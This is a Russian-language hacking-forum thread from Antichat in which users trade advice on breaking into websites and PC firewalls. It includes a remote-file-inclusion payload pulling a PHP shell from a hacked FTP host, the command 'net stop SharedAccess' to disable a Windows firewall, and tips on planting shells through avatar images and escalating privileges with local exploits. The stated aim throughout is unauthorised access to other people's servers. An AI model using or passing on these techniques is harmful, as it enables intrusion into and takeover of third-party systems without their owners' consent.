ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Помогите разобраться с пхп инъекциями плз
Нашел сайт, когда подставляю после index.php?cel= свой урл, открывается сайт с иньекцией и там во фрейме url который я указал.
Решил залить шел, залил шел на ломаную фтпшку и подставил этот url:
index.php?cel=http://site.com/shell.txt
Мне выдало текстовик. Попробовал так
index.php?cel=http://site.com/shell
Так же выдало текстовик
Попробовал так
index.php?cel=http://site.com/shell.php
Вылазит шел доступ для сайта на котором залит шел
Подскажите пожалуйста решение)

скорее всего это просто iframe. никакой инъекции тут нет.

Народ, подскажите пожалуйста как отрубить microsoft firewall?
- после выполнения комманды net stop - винда уходит в ребут. При выполнении sc config просит пароль. Может есть кака-либо народная хитрость? )))

net stop - мало, надо:net stop SharedAccess
или В реестре поставь тип запуска отключен и перебутай винду =)

В общем нужно сламать или получить акк админа.Я отсканировал иксспайдеров и вот мне тут написало:

Возможно ли получить куки админа?

нет

это куки которые тебе сервер на компе оставил. используя эту инфу нельзя получить куки админа.

__________________
Появляюсь редко. Важные дела в реале.

1. Расскажите пожалуйста реально ли сейчас залить шелл через аватарку? Работает ли способ внедрения своего кода в картинку?
2. Есть 2 шелла на 2 серваках, выход на другие сайты закрыт. Тобишь папки других юзеров посмотреть не могу. Есть ли способы как то проникнуть в другие папки?

1. Реально, работает. нужен инклуд или необходимые анстройки сервера (к примеру через .htaccess)
2. Просто тупо прав не хватает. Ищи локальный сплойт под ОСь или под что-нить другой, что на сервере (например мод апача какой-нить бажный)